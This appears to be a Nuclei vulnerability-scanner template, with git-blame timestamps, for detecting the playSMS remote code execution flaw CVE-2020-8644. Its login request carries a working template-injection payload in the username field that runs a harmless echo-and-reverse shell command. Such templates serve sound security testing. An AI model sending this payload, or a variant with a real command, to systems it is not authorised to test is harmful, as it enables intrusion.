nuclei-templates/http/cves/2020/CVE-2020-8644.yaml

67 lines
2.1 KiB
YAML
Raw Normal View History

2022-07-05 20:39:27 +00:00
id: CVE-2020-8644
info:
2022-07-10 05:26:48 +00:00
name: playSMS <1.4.3 - Remote Code Execution
2022-07-05 20:39:27 +00:00
author: dbrwsky
severity: critical
description: PlaySMS before version 1.4.3 is susceptible to remote code execution because it double processes a server-side template.
2023-09-06 12:22:36 +00:00
remediation: |
Upgrade playSMS to version 1.4.4 or later to mitigate this vulnerability.
2022-07-05 20:39:27 +00:00
reference:
- https://research.nccgroup.com/2020/02/11/technical-advisory-playsms-pre-authentication-remote-code-execution-cve-2020-8644/
2022-07-06 05:00:57 +00:00
- https://playsms.org/2020/02/05/playsms-1-4-3-has-been-released/
- https://nvd.nist.gov/vuln/detail/CVE-2020-8644
- http://packetstormsecurity.com/files/157106/PlaySMS-index.php-Unauthenticated-Template-Injection-Code-Execution.html
2023-07-11 19:49:27 +00:00
- https://forum.playsms.org/t/playsms-1-4-3-has-been-released/2704
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-8644
2023-07-11 19:49:27 +00:00
cwe-id: CWE-94
2023-10-14 11:27:55 +00:00
epss-score: 0.96035
epss-percentile: 0.99293
2023-09-06 12:22:36 +00:00
cpe: cpe:2.3:a:playsms:playsms:*:*:*:*:*:*:*:*
metadata:
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: playsms
product: playsms
tags: unauth,kev,packetstorm,cve,cve2020,ssti,playsms,rce
2022-07-05 20:39:27 +00:00
http:
2022-07-05 20:39:27 +00:00
- raw:
- |
GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
- |
POST /index.php?app=main&inc=core_auth&route=login&op=login HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: application/x-www-form-urlencoded
2022-07-06 05:00:57 +00:00
X-CSRF-Token={{csrf}}&username=%7B%7B%60echo%20%27CVE-2020-8644%27%20%7C%20rev%60%7D%7D&password=
2022-07-06 04:45:33 +00:00
2022-07-05 20:39:27 +00:00
cookie-reuse: true
host-redirects: true
2022-07-06 05:00:57 +00:00
max-redirects: 2
2022-07-06 04:45:33 +00:00
matchers-condition: and
matchers:
- type: word
part: body
2022-07-06 05:00:57 +00:00
words:
- '4468-0202-EVC'
2022-07-06 04:45:33 +00:00
- type: status
status:
- 200
2023-07-11 19:49:27 +00:00
extractors:
- type: xpath
name: csrf
internal: true
xpath:
- /html/body/div[1]/div/div/table/tbody/tr[2]/td/table/tbody/tr/td/form/input
attribute: value
part: body